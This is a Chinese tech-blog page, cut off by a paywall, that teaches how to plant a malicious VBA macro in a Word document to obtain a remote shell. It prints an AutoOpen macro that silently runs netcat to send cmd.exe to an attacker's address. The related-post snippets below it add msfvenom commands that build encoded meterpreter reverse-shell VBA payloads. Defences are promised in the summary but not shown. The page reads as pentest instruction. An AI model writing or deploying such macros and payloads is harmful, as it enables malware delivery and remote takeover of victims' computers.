利用宏感染Word文档获取Shell

最新推荐文章于 2024-06-19 00:00:00 发布
最新推荐文章于 2024-06-19 00:00:00 发布
阅读量394 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: word c# 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YtyVerilog/article/details/133080676
本文详细介绍了如何利用宏感染Word文档获取Shell的攻击过程,包括编写恶意宏、插入宏、传播文档及获取Shell的步骤。同时,提出了禁用宏、安全配置和用户培训等防御措施来防止此类攻击。

在网络安全领域,Kali Linux 是一款广泛使用的渗透测试和攻击工具。其中,利用宏感染Word文档获取Shell 是一种常见的攻击手法。本文将详细介绍这种攻击的原理,并提供相应的源代码示例。

  1. 攻击原理

利用宏感染Word文档获取Shell 的攻击原理基于恶意宏(Macro)的利用。恶意宏是一段嵌入在Office文档中的代码,可以自动执行一系列操作。攻击者通过在Word文档中插入恶意宏,当受害者打开该文档时,恶意宏将被执行,从而导致Shell(命令行界面)的获取。

  1. 攻击步骤

以下是利用宏感染Word文档获取Shell 的攻击步骤:

步骤 1: 编写恶意宏

首先,攻击者需要编写恶意宏代码。恶意宏通常使用Visual Basic for Applications(VBA)编写,并嵌入到Word文档中。以下是一个简单的恶意宏示例:

Sub AutoOpen()
    Shell "cmd.exe /k netcat.exe 192.168.0.1 1234 -e cmd.exe", vbHide
End Sub

上述恶意宏代码在文档打开时会自动执行,它使用Shell函数调用cmd.exe 并与远程主机建立连接,从而获取Shell。

步骤 2: 插入恶意宏

攻击者将恶意宏插入到Word文档中。可以通过以下步骤实现:

  • 打开Word文档
  • 点击 “开发工具” 选项卡
  • 选择 “Visual Basic”,打开Visual Basic编辑器
了解本专栏 订阅专栏 解锁全文
利用感染 word 文档获取windows系统的 shell
Cwillchris的博客
05-27 507
利用感染 word 文档获取window的 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) office 2016 实验步骤: 1、生成后门 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-ex
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透4 —利用感染 word 文档获取 shell
最新发布
天下著书立传者,皆为我师
08-02 1432
Metasploit 渗透测试之利用木马、病毒实施渗透4 —利用感染 word 文档获取 shell
网络安全kali之利用感染word文档获取shell
xueshenlaila的博客
03-25 8400
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe 执行完成后会生成2段代码 第一段代码是MACRO CODE [ˈmækrəʊ k
MSF利用病毒感染word文档获取shell复现
永远是少年
06-14 3108
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用病毒感染word文档获取shell复现。 一、环境准备 二、文档生成 三、效果检验
cs生成office病毒获取shell
2201_75387456的博客
06-19 475
编写主体内容后,点击“开发工具—VisualBasic”,双击“ThisDocument”打开Word文档,点击“Word选项—自定义功能区—开发者工具(勾选)—确定”。,将原有内容全部清空,然后将payload全部粘贴进去,保存并关闭该VBA编。kali(服务端):192.168.216.40。首先,启动cs的应用界面,这里用的是cs4.8。上面原来有一个监听不用管(当没有就好)最后上传到win10打开后成功获取到权限。win11(客户端)
特殊格式docx文档进行xxe的getshell
yggcwhat
04-16 1425
0x00 背景 前两天在realworld挖到一个docx的xxe漏洞,昨天朋友和我说国外某CTF也出现其中考点了,所以我把docx格式的xxe来简单总结下 0x01前置知识 首先是关于docx这种格式 在微软2007之后 在传统的文件名都添加了x 比如pptx xlsx,还有我们本文提到的docx 他的优点是占用空间会比doc文件占有的少,并且他的本质其实是个xml文件 当你拿到一个docx文件时 使用本机自带的unzip命令进行解压 会得到如下的xml文件 因为docx文件的主要内容是保存
office病毒反弹shell实验
AFCC_的博客(Web_Dog)
12-10 1391
0x00 什么是病毒 病毒就是Word中被嵌入的带有恶意行为的代码(VBA代码),当打开带有病毒的word文档时,嵌入其中的代码会自动运行 Word 将下列名称识别为自动,或称“auto”,当相应动作被执行,会自动调用满足条件的VBA代码。 AutoExec:启动 Word 或加载全局模板时 AutoNew:每次新建文档时 AutoOpen:每次打开已有文档时 ...
前面不要直接在word里面拷贝脚本贴到shell里面去执行
wgz7747147820的博客
09-24 794
我在word里面拷贝一个环境变量,执行完后,再查询发现里面有乱码,应该是从word里面拷贝会有不可见字符 真是害人不浅啊 [Thu Sep 24 03:35:15][270894][root@scaqan03dv0101:~][0]# export oss_username='arun.devaraj@aaa.com' [Thu Sep 24 03:35:26][270894][root@scaqan03dv0101:~][0]# [Thu Sep 24 03:35:28][270894][root@sc
KaLi做木马渗透实战案例
开摆工作室(kbai.cc)
04-04 5610
KaLi做木马渗透实战案例
信息安全技术(一)渗透攻击
m0_73736174的博客
05-27 2174
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架介绍:客户端攻击总是一个有趣的话题,并成为今日攻击者的主要攻击目标。随着网络管理员和软件开发人员加强周边环境,测试人员需要找到一种方法让受害者为他们进入网络打开大门。客户端攻击需要用户交互,例如诱使用户点击链接,打开文档或以某种方式进入恶意网站。
word源码java-Windows_Shell_Scripts:Windows下的常用脚本
06-05
word源码java Windows环境下可能用到的shell脚本与Office VBA代码 Microsoft Word 代码表格 可以自动生成容纳代码的表格,设置底纹为RGB(39, 40 34),搭配Notepad++的NppExport -> Copy HTML to Clipboard,完美实现源代码的呈现。 可以在下面的链接中找到源下载地址。 管理员取得所有权 有些文件夹的读写需要管理员权限,导入这个注册表文件,可以快速把管理员取得所有权这一个选项加入到右键菜单。 可以在下面的链接中找到源下载地址。 minttyrc Cygwin的配置文件。使用的时候千万不要设置Java的字符环境变量。PICK之后就彻底乱了! vimrc 这是一个很复杂的vim配置文件,不建议使用vim做开发
Kali渗透测试:使用Word病毒进行渗透攻击
Bruce_xiaowei的博客
05-14 5364
Kali渗透测试:使用病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。病毒在Word中引入之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,病毒利用这一点得到了大范围的传播。 构造一个包含病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 病毒会执行, 然后感染其他文件或
Shell(bash)脚本入门
Robin_Pi的博客
11-18 531
脚本脚本参数注释命令执行结果 依旧摘自阮大佬的Bash教程,这里仅做个人学习记录。 脚本参数 script.sh word1 word2 word3 上面例子中,script.sh是一个脚本文件,word1、word2和word3是三个参数。 脚本文件内部,可以使用特殊变量,引用这些参数: $0:脚本文件名,即script.sh $1~$9:对应脚本的第一个参数到第九个参数 $@:全部的参数,参数之间使用空格分隔 $*:全部的参数,参数之间使用变量$IFS值的第一个字符分隔,默认为空格,但是可以自定义。
如何优雅的在 Microsoft word中插入代码
Mr_HHH的博客
04-08 4620
近日需要写一些包含代码的Word文档,直接复制代码进去并不优雅,于是从网上发现了这个小工具,和大家分享一下。 一、工具 http://www.planetb.ca/syntax-highlight-word 二:操作步骤: 第一步:打开上面这个网站,截图如下: 第二步:将自己的代码复制到这个Code文本框中,并点击Show Hightlighted按钮,会自动打开一个新页面,该页面中...
利用Office及Powershell的针对性攻击样本分析
weixin_30437337的博客
03-08 265
360安全卫士 · 2016/06/24 13:25Author:360天眼安全实验室0x00 背景人在做,天在看。利用Powershell执行攻击由于其绕过现有病毒查杀体系的有效性,已经成为目前日益泛滥的攻击手段,不论普遍撒网的勒索软件还是定向的针对性攻击都有可能采用。360天眼实验室一直对此类样本做持续的监测, 5月份以来,我们注意到一类比较特别的样本,发现其有两个比较鲜明的特点。利用Exce...
Kali linux 学习笔记(九十六)metasploit framework——客户端渗透 2020.4.28
闵行小鱼塘
04-28 1035
本节学习客户端渗透
全能型恶意攻击出现 利用和PowerShell攻击金融交易系统
weixin_33957648的博客
07-03 160
研究人员警告称,攻击者正使用嵌入恶意Word 文档和 PowerShell,用非硬盘驻留型恶意软件感染计算机。 带有恶意Word 骚扰文档在过去几个月内成为了感染计算机的主流手段之一。如今攻击者更进一步,使用此类文档传输非硬盘驻留型(Fileless)恶意软件。这种恶意软件没有文件实体,可以直接加载到受害计算机的内存中。 安全研究人员分析了...
如何优雅地在 Word 中插入代码【转载】
过招
04-28 997
如何优雅的在 Microsoft word中插入代码 就盼着五一放假了!放假了炸就是了。 买了那么多书终归是要看的,要不然它们就了。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值